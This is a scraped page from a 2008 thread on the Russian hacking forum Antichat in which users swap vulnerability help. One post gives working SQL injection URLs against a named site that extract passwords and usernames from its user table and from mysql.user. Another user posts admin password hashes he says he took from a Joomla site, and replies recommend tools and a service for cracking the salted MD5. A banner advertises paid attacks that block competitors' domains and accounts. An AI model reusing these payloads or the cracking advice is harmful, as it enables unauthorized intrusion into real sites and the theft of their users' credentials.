Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 296 из 2422

296

Опции темы

Поиск в этой теме

Опции просмотра

17.08.2008, 01:32

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

С нами: 10172486

Репутация: 874

Да что то информатион_схема недоступна.
Но мысли есть вот такие
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user_name)),6,7+from+us er

Вдогонку

http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.u ser+limit+0,1

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Red_Red1; 17.08.2008 в 01:41..

17.08.2008, 07:14

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

С нами: 10081287

Репутация: 568

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Цитата:

Вдогонку

это понятно..) я про information_schema спрашивал. всеровно спс.)

ап

Последний раз редактировалось sabe; 17.08.2008 в 20:21..

17.08.2008, 08:05

Cry Wolf

Новичок

Регистрация: 18.07.2008

Сообщений: 12

С нами: 9376826

Репутация: 3

Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мыла

Цитата:

bla'<script>alert()</script>

получил переадресацию на другой сайт.

alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД:

Цитата:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 176

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 181

Это уязвимость? Или просто тупой глюк?

17.08.2008, 08:07

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

С нами: 10081287

Репутация: 568

' ? = sql inj

17.08.2008, 09:02

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

С нами: 9742875

Репутация: 81

Достал я парол я хэши из джумлы

admin:6f0f0e2db9c8f58e2b309afa6569f744

SX0uUSDl4I rdL63

или

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?

17.08.2008, 09:32

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

С нами: 10126406

Репутация: 206

Цитата:

Сообщение от truelamer

Достал я парол я хэши из джумлы

admin:6f0f0e2db9c8f58e2b309afa6569f744

прога PasswordsPro при добавлении тип хеша указываешь MD5(HMAC), должно помочь

17.08.2008, 10:02

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

С нами: 9742875

Репутация: 81

спасибо но думаю не в этом дело, я то знаю сервисы где md5 можно подобрать, А тут вроде как конкотинасия пароля с правой кадаброй после :. Вот мне интересны сервисы кот позволяют узнать пароль вбив хэш и кадабру. Или как это вообще можно сделать

17.08.2008, 11:02

BlackSun

Познавший АНТИЧАТ

Регистрация: 01.04.2007

Сообщений: 1,268

С нами: 10058786

Репутация: 4589

Это не кадабра, это соль. Юзай PasswordsPro

17.08.2008, 12:29

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

С нами: 10339586

Репутация: 1396

сервис..мм..попробуй, там по моему соленые мд5 тоже катят:

Цитата:

https://hashcracking.info/

#10

17.08.2008, 16:29

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

С нами: 9742875

Репутация: 81

а вот это какого вида???

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

вида md5(md5($pass).$salt) или какого?

Страница 296 из 2422

296

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules